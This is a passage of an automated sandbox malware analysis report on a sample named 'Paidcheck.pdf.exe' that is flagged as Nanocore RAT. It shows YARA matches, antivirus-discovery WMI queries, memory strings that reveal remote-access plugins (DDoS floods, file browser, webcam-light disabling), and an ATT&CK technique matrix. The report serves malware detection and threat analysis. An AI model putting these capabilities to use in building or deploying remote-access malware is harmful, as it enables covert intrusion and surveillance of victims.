      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeQueries volume information: C:\Users\user\AppData\Local\Temp\RegAsm.exe VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
      Source: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exeQueries volume information: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe VolumeInformation
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeCode function: 10_2_06CC02F0 GetSystemTimes,10_2_06CC02F0
      Source: C:\Users\user\Desktop\Paidcheck.pdf.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiVirusProduct
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM AntiSpywareProduct
      Source: C:\Users\user\AppData\Local\Temp\RegAsm.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT DisplayName FROM FirewallProduct

      Stealing of Sensitive Information:

      barindex
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f60000.23.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c3dc19.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c395f0.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f64629.22.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f60000.23.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c395f0.11.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c24c35.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3d596b5.14.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3d4d481.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3d6dce2.13.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.480862241.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORY

      Remote Access Functionality:

      barindex
      Detected Nanocore RatShow sources
      Source: Paidcheck.pdf.exe, 00000000.00000002.306467262.0000000002F7B000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegAsm.exeString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegAsm.exe, 0000000A.00000002.480862241.0000000002BD1000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Source: RegAsm.exe, 0000000A.00000002.489612567.0000000006AF0000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreStressTester.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreStressTesterClientPluginHTTPFloodSlowLorisSYNFloodTCPNanoCoreStressTester.FloodUDPSendSynCommandHandlerResourcesNanoCoreStressTester.My.ResourcesMySettingsMySettingsPropertyCommandsMethodsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostIClientDataHostDataHostClientGUIDSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHost_DataHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketStartHostToAttackArrayUploadDataSiteUserAgentRefererValuesGeneratecodelengthSystem.ThreadingThreadThreadsPortToAttackTimeToAttackThreadstoUseThreadsEndedattacksAttackRunningFloodnewHostnewPortnewTimenewThreadslolStopSlowlorisStressThreadStart_floodingJob_floodingThreadSystem.NetIPEndPoint_ipEo_synClassHostIsEnabledPortSuperSynSocketsStartSuperSynStopSuperSynSystem.Net.SocketsSocketClientIPPacketsPacketSizeMaxPacketsStopFloodmPacketspSize_sockipEosuperSynSockets__1IAsyncResultOnConnectarSendFloodingstopHTTPBytesSentSYNConnectionsHTTPDataSentMethodTargetAddressTargetStatusupdateBytesnewSYNFloodHandleDDOSCommandHandleStopCommandSystem.TimersElapsedEventArgsbytesTimerElapsedsourceeHandleHTTPCommandHandleSlowlorisCommandHandleTCPCommandHandleUDPCommandHandleSYNCommandSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__sendStressCommandupdateStatusColumnstopStressCommandHTTPSlowlorisSYNSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeExceptionSendToServerProjectDataSetProjectErrorClearProjectErrorTimerNanoCoreIClientNameObjectCollectionget_VariablesGetValueset_Intervalset_EnabledElapsedEventHandleradd_ElapsedParamArrayAttributeRandomGuidStringIsNullOrEmptyArgumentNullExceptionArgumentOutOfRangeExce
      Source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCoreBase.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainNanoCoreBaseClientPluginCommandHandlerResourcesNanoCoreBase.My.ResourcesMySettingsMySettingsPropertyCommandsMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostSendCommandparamsInitializePluginNanoCore.ClientPluginIClientNetwork_networkhost_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketHandleCommandHandleCommandOpenWebsiteHandleCommandMessageBoxSwapMouseButtonfSwapuser32.dllHandleCommandMouseSwapHandleCommandMouseUnswapmciSendStringlpszCommandlpszReturnStringcchReturnLengthhwndCallbackwinmm.dllmciSendStringAHandleCommandCDTrayHandleCommandCDTrayCloseSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CultureValueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsEnumvalue__OpenWebsiteMessageBoxCDTrayCDTrayCloseMouseSwapMouseUnswapSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeSendToServerParamArrayAttributeStringProcessStartSystem.Windows.FormsDialogResultShowConversionsReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedNanoCoreBase.Resources.resourcesDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeNanoCoreBase.dll+set CDAudio door open/set CDAudio door closed-NanoCoreBase.Resources3
      Source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationFileBrowserClient.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainFileBrowserClientClientPluginCommandHandlersResourcesFileBrowserClient.My.ResourcesMySettingsMySettingsPropertyFunctionsCommandTypesMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostIClientNetworkHostNetworkHostCurrentDirectoryInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHost_networkHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleCreateDirectoryremoteDirHandleDeleteFileremoteFileisDirectoryHandleOpenFileHandleReceiveFilelocalFileHandleRenameFilenewFileNameHandleSetCurrentDirectorypathHandleDeleteHandleDownloadHandleDrivesHandleFilesHandleGetCurrentDirectoryHandleMachineNameHandleOpenHandleSetCurrentDirectoryPacketHandleUploadHandleRenameHandleCreateSendCurrentDirectorySendDrivesSendFileSendFilesSendMachineNameSystem.ResourcesResourceManagerresourceManSystem.GlobalizationCultureInforesourceCultureget_ResourceManagerget_Cultureset_CulturevalueCultureSystem.ConfigurationApplicationSettingsBasedefaultInstanceget_DefaultDefaultget_SettingsSettingsSystem.Collections.GenericList`1RemoteFilesRemoteFoldersRemoteDrivesEnumerateRemoteFilesEnumerateRemoteDrivesLogMessagemessageEnumvalue__MachineNameDrivesFilesGetCurrentDirectorySetCurrentDirectoryDownloadUploadOpenDeleteCreateDirectoryRenameSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeEnvironmentSpecialFolderGetFolderPathStringFormatSystem.IODirectoryDirectoryInfoProjectDataExceptionSetProjectErrorClearProjectErrorFileLogClientExceptionProcessStartConvertFromBase64StringWriteAllBytesMoveSendToServerConversionsToBooleanInt32NewLateBindingLateIndexGetEnumeratorEmptyGetEnumeratorget_CurrentTrimConcatMoveNextIDisposableDisposeReadAllBytesToBase64StringIsNullOrEmptyget_MachineNameToUpperget_UserNameReferenceEqualsSystem.ReflectionAssemblyget_AssemblyCompilerGeneratedAttributeSettingsBaseSynchronizedFileInfoFileSystemInfoget_FullNameContainsGetDirectoriesget_NameAddGetF
      Source: RegAsm.exe, 0000000A.00000002.481024658.0000000002C47000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationMyClientPlugin.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1ClientMainMyClientPluginClientPluginMiscCommandHandlerCommandTypeMiscCommandMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceNanoCore.ClientPluginHostIClientLoggingHostLoggingHostInitializePluginNanoCore.ClientPluginIClientNetwork_loggingHostBuildingHostCacheConnectionFailedhostportConnectionStateChangedconnectedPipeClosedpipeNamePipeCreatedReadPacketparamsHandleMiscCommandHandleMiscCommandMessageInterpretRecievedcommandtodoloopkeysEnumvalue__MessageStringExceptionMicrosoft.VisualBasic.CompilerServicesOperatorsCompareStringServerComputerMicrosoft.VisualBasic.MyServicesRegistryProxyget_RegistryMicrosoft.Win32RegistryKeyget_LocalMachineConcatInt32SetValueProjectDataSetProjectErrorClearProjectErrorget_LengthStandardModuleAttributeSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerNonUserCodeAttributeDebuggerHiddenAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeDebuggableAttributeDebuggingModesCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeMyClientPlugin.dll'DisableWebcamLights
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f60000.23.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c3dc19.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c395f0.11.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c69950.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f64629.22.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.5f60000.23.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c395f0.11.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3c24c35.9.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c91970.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3ce1990.6.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c69950.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3c91970.2.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3eceb18.5.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3d596b5.14.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3d4d481.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3e36bd0.4.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 10.2.RegAsm.exe.3d6dce2.13.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0.2.Paidcheck.pdf.exe.3ce1990.6.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 0000000A.00000002.486028172.0000000003C21000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.480862241.0000000002BD1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.306569073.0000000003C69000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.475784667.0000000000402000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.488145685.0000000005F60000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 0000000A.00000002.486159057.0000000003C9E000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000000.00000002.306631501.0000000003CE1000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: Paidcheck.pdf.exe PID: 4608, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management Instrumentation1DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools1Input Capture21System Time Discovery1Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScripting111Scheduled Task/Job1Process Injection212Deobfuscate/Decode Files or Information1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolInput Capture21Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsScheduled Task/Job1Registry Run Keys / Startup Folder11Scheduled Task/Job1Scripting111Security Account ManagerSystem Information Discovery13SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationRemote Access Software1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsPowerShell1Logon Script (Mac)Registry Run Keys / Startup Folder11Obfuscated Files or Information12NTDSQuery Registry1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol1SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware Packing12LSA SecretsSecurity Software Discovery211SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonTimestomp1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsDLL Side-Loading1DCSyncVirtualization/Sandbox Evasion21Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading12Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
